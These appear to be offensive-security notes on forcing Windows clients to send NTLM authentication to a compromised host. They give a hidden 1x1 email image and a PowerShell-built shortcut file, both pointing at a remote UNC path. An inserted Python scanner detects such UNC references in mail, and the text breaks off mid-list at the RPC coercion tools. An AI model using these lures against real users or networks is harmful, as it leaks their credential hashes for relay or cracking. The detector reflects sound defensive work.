To coerce NTLM authentication to a compromised host:

Email

Assuming access to an email inbox (e.g. Outlook), send the target client an email containing a 1x1 image (or modify the sender’s signature to sneak it into legitimate emails):

<img src="\\$VULN_SRV_IP\test.ico" height="1" width="1" />
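Seen from the defending side, the image tag above is easy to spot before a client renders it. The following is an added example, not part of the original notes: it scans an HTML mail body for element attributes that point at a UNC path or a remote file:// URL. The names remote_host, scan_html and UncFinder are hypothetical, the sample body is constructed, and CSS url() references are not covered.

```python
"""Flag HTML mail bodies whose elements load resources from a UNC/SMB path."""
import re
from html.parser import HTMLParser

# Attributes that reference a resource the client may load (assumed set).
FETCH_ATTRS = {"src", "background", "href", "poster", "data"}
UNC_RE = re.compile(r"\\\\([^\\\s]+)\\")


def remote_host(value):
    """Return the host of a UNC path or file:// URL, or None if not remote."""
    v = value.strip()
    if v.lower().startswith("file:"):
        rest = v[5:].replace("/", "\\")
        path = rest.lstrip("\\")
        slashes = len(rest) - len(path)
        # file:/path and file:///path are local; file://host/ and file:////host/ are remote.
        if slashes < 2 or slashes == 3:
            return None
        v = "\\\\" + path
    m = UNC_RE.match(v)
    return m.group(1) if m else None


class UncFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, host) per remote reference

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in FETCH_ATTRS and value and (host := remote_host(value)):
                self.findings.append((tag, name, host))


def scan_html(body):
    finder = UncFinder()
    finder.feed(body)
    finder.close()
    return finder.findings


# Constructed sample body; 198.51.100.7 is a documentation-range address.
SAMPLE = r'''<html><body><p>Quarterly report attached.</p>
<img src="https://intranet.example.test/logo.png">
<img src="\\198.51.100.7\test.ico" height="1" width="1" />
<img src="file://198.51.100.7/share/sig.png">
<img src="file:///C:/Users/a/sig.png"></body></html>'''

if __name__ == "__main__":
    for tag, attr, host in scan_html(SAMPLE):
        print(f"remote SMB reference: <{tag} {attr}=...> host={host}")
```
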

Shortcut file

Send the target client a shortcut file whose icon is located on a remote compromised host (UNC path). An authentication request to download the icon is triggered whenever the file is shown in File Explorer (no click required).

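# Create a shortcut via the WScript.Shell COM object
$Wsh = New-Object -ComObject WScript.Shell
$Shortcut = $Wsh.CreateShortcut("test.lnk")
# The icon is referenced by UNC path on the remote host
$Shortcut.IconLocation = "\\$VULN_SRV_IP\test.ico"
$Shortcut.Save()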

Trigger Remote Authentication

Use certain tools to make computer accounts authenticate to a server (typically using RPC protocols for printing and EFS), e.g.: